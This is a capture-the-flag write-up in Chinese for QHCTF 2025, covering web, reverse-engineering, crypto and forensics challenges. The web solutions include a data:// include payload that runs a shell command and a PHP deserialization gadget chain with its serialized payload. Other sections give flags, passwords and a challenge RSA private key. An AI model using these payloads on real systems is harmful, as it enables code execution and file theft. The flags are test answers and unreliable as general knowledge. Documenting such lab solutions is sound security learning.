cyi启航杯wp

web

Easy_include

我用data伪协议(include会把data://里的内容当PHP代码执行,前提是目标开启了allow_url_include)

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

然后看源代码就有了


QHCTF{008110b0-0ea4-4ff3-b02e-bd9e74f1be44}


Web_IP

flag.php有

Your IP is : xxx....

原本以为X-Forwarded-For就行,后面发现X-Forwarded-For输入什么都会回显原内容

ssti探测发现。。。


QHCTF{7681991d-96c0-4850-a5ad-0b92ddd227fe}


Web_pop

如题

<?php
// Prints this file's own source, syntax-highlighted, into the response.
highlight_file(__FILE__);
// Challenge class with two magic-method hooks: one fires on destruction,
// the other calls whatever value is stored in $func.
class Start{
    public $name;
    //protected $func;
    public $func;
    // Runs when the object is destroyed. The concatenation converts
    // $this->name to a string, which invokes __toString() when it is an object.
    public function __destruct()
    {
        echo "Welcome to QHCTF 2025, ".$this->name;
    }
 
    // Runs when isset()/empty() touches an inaccessible or undefined property
    // of this object. $func is called as-is; nothing here checks what it holds.
    public function __isset($var)
    {
        ($this->func)();
    }
}
 
// Challenge class: __toString() forwards a method call to $obj, and
// __invoke() prints the contents of /flag.
class Sec{
    // private $obj;
    // private $var;
    public $obj;
    public $var;
    // Runs on string conversion. Calls check() on $obj with $var as the only
    // argument; if $obj's class defines no check(), PHP routes the call to
    // that class's __call() instead.
    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }
 
    // Runs when the object is called like a function.
    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}
 
// Challenge class whose __call() clones the first argument of any method
// call that the class does not define.
class Easy{
    public $cla;
 
    // $fun is the requested method name, $var the argument list. The clone
    // expression invokes __clone() on the copy when the argument's class
    // defines one.
    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}
 
// Challenge class whose __clone() probes a property on $obj.
class eeee{
    public $obj;
 
    // Runs on the copy produced by clone. isset() on a property that $obj
    // does not expose invokes $obj's __isset() when its class defines one.
    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

// Builds the object graph for the property-oriented chain and prints its
// serialized form. When the outer Start object is destroyed, the magic
// methods fire in this order: Start::__destruct -> Sec::__toString ->
// Easy::__call -> eeee::__clone -> Start::__isset -> Sec::__invoke.
// NOTE(review): every step relies on the target deserializing request data
// with these classes loaded (that call is not shown on the page); on the
// defending side, unserialize() with ['allowed_classes' => false], or a
// data-only format such as JSON, keeps such a graph from being instantiated.
// NOTE(review): with the public properties declared here, serialize() emits
// plain property names; the submitted payload also carries "\0*\0func" and
// "\0Sec\0obj" names, which match the commented-out protected/private
// declarations, so it was presumably produced against those -- confirm.
$entry = new Start();          // destroyed first; its $name gets stringified
$stringifier = new Sec();      // __toString() forwards check() to $obj
$entry->name = $stringifier;
$proxy = new Easy();           // has no check(), so __call() handles it
$cloned = new eeee();          // the argument that __call() clones
$stringifier->obj = $proxy;
$stringifier->var = $cloned;
$proxy->cla = $cloned;
$trigger = new Start();        // target of the isset() probe in __clone()
$cloned->obj = $trigger;
$reader = new Sec();           // called through $func, reaches __invoke()
$trigger->func = $reader;
echo serialize($entry);
pop=O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:7:"%00*%00func";O:3:"Sec":2:{s:8:"%00Sec%00obj";N;s:8:"%00Sec%00var";N;}}}}s:3:"var";r:4;}s:4:"func";N;}

QHCTF{91d8bcbd-5484-4272-a1d3-694794b4d6f6}



re

Checker

跟进check flag,encrypt flag函数,得到加密逻辑,只是逐字节异或了个0x23,重新异或一下就行

拿出加密数据

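# Encrypted flag bytes taken from the Checker binary.
# (Named `ciphertext` rather than `hex` so the builtin hex() stays usable.)
ciphertext = [
    0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46,
    0x15, 0x40, 0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46,
    0x14, 0x45, 0x16, 0x0E, 0x17, 0x45, 0x42, 0x41,
    0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E, 0x46, 0x42,
    0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15,
    0x42, 0x16, 0x5E
]

# The encrypt routine XORs every byte with one constant. XOR is its own
# inverse, so applying the same constant again restores the plaintext.
XOR_KEY = 0x23
flag = bytes(b ^ XOR_KEY for b in ciphertext)
print(flag)
#b'QHCTF{ee6c7b9c-e7f5-4fab-9bdf-ea07e034f6a5}'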

rainbow

有个hideflag函数,进去发现够用了

有个output.txt文件

Encrypted Flag: 0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F3B6E69623B6D393F6D6227

又是简单的异或,xor_encrypt函数里面是a1^a2,等于我们自己异或90就行

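# Bytes of the "Encrypted Flag" hex string from output.txt.
# (Named `ciphertext` rather than `hex` so the builtin hex() stays usable.)
ciphertext = [
    0x0B, 0x12, 0x19, 0x0E, 0x1C, 0x21, 0x3B, 0x62, 0x68, 0x68, 0x6C, 0x6B, 0x6A, 0x69, 0x77, 0x6F, 0x3B, 0x63, 0x3B,
    0x77, 0x6E, 0x3C, 0x3B, 0x6D, 0x77, 0x3B, 0x38, 0x39, 0x3C, 0x77, 0x3E, 0x3F, 0x3B, 0x6E, 0x69, 0x62, 0x3B, 0x6D,
    0x39, 0x3F, 0x6D, 0x62, 0x27
]

# xor_encrypt computes a1 ^ a2 with a single-byte key of 90, so XORing each
# byte with 90 again undoes it.
XOR_KEY = 90
flag = bytes(b ^ XOR_KEY for b in ciphertext)
print(flag)
#b'QHCTF{a8226103-5a9a-4fa7-abcf-dea438a7ce78}'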

小明的note

upx脱个壳先

密文


加密逻辑在decrypt flag函数中,每个字节先与密钥循环异或,再与当前下标加一(i+1)异或

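# Ciphertext bytes taken from the unpacked binary.
# (Named `ciphertext` rather than `hex` so the builtin hex() stays usable.)
ciphertext = [
    0x12, 0x7D, 0xE1, 0x2C, 0x01, 0x4A, 0xC4, 0x45, 0x78, 0x5E, 0xC9, 0x46,
    0x78, 0x5D, 0x83, 0x0F, 0x37, 0x12, 0xD0, 0x45, 0x63, 0x42, 0xD5, 0x57,
    0x76, 0x14, 0xDE, 0x06, 0x6E, 0x04, 0x8F, 0x3E, 0x50, 0x21, 0xE1, 0x3B,
    0x53, 0x72, 0xB7, 0x6C, 0x5D, 0x79, 0xF7
]

# Repeating XOR key used by the binary.
key = [0x42, 0x37, 0xA1, 0x7C]

# Each byte is XORed with the repeating key and with its 1-based position.
# Both steps are XORs, so repeating them restores the plaintext. The key
# index uses len(key) instead of a literal 4 so the two cannot drift apart.
flag = bytes(
    c ^ key[i % len(key)] ^ (i + 1)
    for i, c in enumerate(ciphertext)
)

print(flag)
#b'QHCTF{b13cc67d-cd7b-4cc3-9df1-1b34cc4c186d}'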


crypto

Easy_RSA

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# Private key and encrypted message provided by the challenge.
# private_key is a PEM-encoded RSA key held as bytes; enmessage is Base64
# text that decrypt_message() decodes before decrypting.
private_key = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCk9qroUGqV/4glx5oHbMkAZFrGAQF+kclLnbqHcHAXz5ElOwaI\n9KdHjMU2DhAgOgvS/Hpc5Qv6wcpB+J1z6x/epTWOcpTAjk0GZGbhyKEnuMhgwATu\neks8uO8J6VNNTXc9MIp9agGHVL5AzOewEiihWDBJ1oiUl01Ju4LwhtY5mQIDAQAB\nAoGAGKmgJ5dOOBq5+hv7VTzYWCyovY2M8aVOGPX92x3eRFEN/Cj08yjQkYvkOA6m\nLos/FU4V5SmBPv4WBQLsV1ZBr0RFYBVWCB0m2DRZyj085vRAChFm2OA6DbSVAe6v\nJgOschwpIMUiAYUgm4kVFSqXy/egJYOIbCUBgvFBJmXbITkCQQDNKTK0x076yhzY\nQIuZm4E52CXo8ma4xESW82FBOgk+jKCXts/cKdJHg56wW1+3W5zxShrNYzXMKi9E\niQUotBk3AkEAzdd3axQ2SZjS/nwtWGDvkj87YJXJ/OriOJdQj9LpX5ZG4cuolT4c\nb5IXfFD/UJX6OipY8/vwp1neWdCy58lrrwJACxaM7QRQmnFN+coTQWwMIeoyslJX\nhujkpBvnR7UxRrYm/8wbk9SWztKoQvPNSoWjB89vf2Y7RBuLjnKxWq/RJQJATYQe\nzIxIBV8v1fYdfXLDxWdajPzbnAs4NeeFxyO+DukguFdhnRJO0xVJEt/NxiM0oELi\nTL9L2TnWqiwVs4P+sQJBAL4pbxfDpLORtIug5nK4XovI5xpLNu1xCJeBE3ZImHTH\n7Hgd6v1Y4DenDddRCq1yQWHIlVFeM94RCwKDtLhuj9s=\n-----END RSA PRIVATE KEY-----'
enmessage = "ceabOhrOBcDv3Cor/SPOK2W5veeSEDCcm3ZcAkyhwpe2xUEoIek0LImSWSarM8ABcavdoOjlZW6kw1S8mjf1TjCmhrZ0b+RbWQTfFAE4UEilE3TBhprpLR3rLP2UlLMNvC7Rrscl3tXxgzXjRd5IJRZbmkk2GLqA/Zx6pZ/cnPM="

def decrypt_message(encrypted_message, private_key):
    """Decrypt a Base64-encoded RSA-OAEP ciphertext and return it as text.

    Args:
        encrypted_message: Base64 text of the ciphertext.
        private_key: RSA private key in a form ``RSA.import_key`` accepts.

    Returns:
        The plaintext, decoded with ``bytes.decode()`` (UTF-8 by default).
    """
    rsa_key = RSA.import_key(private_key)
    oaep = PKCS1_OAEP.new(rsa_key)
    raw_ciphertext = base64.b64decode(encrypted_message)
    return oaep.decrypt(raw_ciphertext).decode()

# Decrypt the challenge ciphertext with the provided key and show the result.
plaintext = decrypt_message(enmessage, private_key)
print(plaintext)
#QHCTF{a2a33351-720d-4fe1-bafd-3aa2f0863a58}


misc

PvzHE

images目录下

QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5}



forensics

天天蓝屏,佛了,还有两个题死活不对,懵逼ing

仿真可看https://www.cnblogs.com/xhzccy/p/18354852

ftk以writable形式挂载.E01

以管理员形式打开vm --》新建虚拟机 --》自定义 --》--》稍后安装 --》win10(或其他) --》选择安装位置 --》BIOS--》自己分配处理器和内存 --》默认(nat) --》默认(推荐)--》SATA --》使用物理磁盘 --》设备选择刚刚挂载的PhysicalDrive2(最后的数字可能不一样) --》下一步下一步


Win_02

admin是123456进去的,直接试HackY$_123456,对了。。

QHCTF{fb484ad326c0f3a4970d1352bfbafef8}


Win_04

regedit就有了


QHCTF{c980ad20-f4e4-4e72-81a0-f227f6345f01}


Win_07

flag文件,有注释Please look for the password in the environment variables.

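密码在注册表中(环境变量本身就保存在注册表里,系统级在HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment,用户级在HKCU\Environment):Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now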

UUhDVEZ7NjE0M2I0NmEtOGU5OC00MzU2LWE5YjItMjUxYTdlYzE5ZTUxfQ==

然后base64解码

QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51}


不知道哪题

桌面的hacker.exe,pyinstxtractor解包出1.pyc

https://tool.lu/pyc/,pyc转py(在线反编译会把样本上传给第三方,处理真实案件的样本时可改用pycdc等本地工具)

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

def xor_decrypt(data, key):
    """XOR each byte of *data* with *key*, repeating the key as needed.

    XOR is symmetric, so the same call both applies and removes the mask.
    """
    key_len = len(key)
    return bytes(byte ^ key[pos % key_len] for pos, byte in enumerate(data))

def decrypt_message(aes_key, encrypted_message):
    """Peel off the sample's encoding layers and return the plaintext string.

    Layers, outermost first: Base64, repeating-key XOR with ``b'qihangcup'``,
    Base64 again, then AES in ECB mode with the padding stripped by ``unpad``.

    Args:
        aes_key: AES key bytes passed straight to ``AES.new``.
        encrypted_message: Base64 text of the outermost layer.

    Returns:
        The decrypted data decoded as UTF-8.
    """
    # Layer 1: outer Base64.
    outer = base64.b64decode(encrypted_message)

    # Layer 2: XOR mask. The key is a fixed constant, so this step only
    # obscures the data; it adds no secrecy once the constant is known.
    xor_key = b'qihangcup'
    inner_b64 = xor_decrypt(outer, xor_key)

    # Layer 3: inner Base64.
    aes_blob = base64.b64decode(inner_b64)

    # Layer 4: AES-ECB (no IV involved), then remove the block padding.
    ecb = AES.new(aes_key, AES.MODE_ECB)
    padded = ecb.decrypt(aes_blob)
    return unpad(padded, AES.block_size).decode('utf-8')

# Script entry point.
if __name__ == '__main__':
    # AES key and encrypted message fed to decrypt_message(); presumably both
    # were read out of the decompiled 1.pyc -- the page does not show that step.
    aes_key = b'acf8bafa15f8cb03'
    encrypted_message = 'HgIlNCQUF0MZRA0FMhwODBsTNjM4OQ8RMA81SCImFhQeVkQdCUJfMBs0Mx0fGVowIyoTJ0cdHCwKVwxIOQQCRA=='

    print(decrypt_message(aes_key, encrypted_message))
    #QHCTF{8b0c14a8-5823-46fd-a547-0dcdc404a7ed}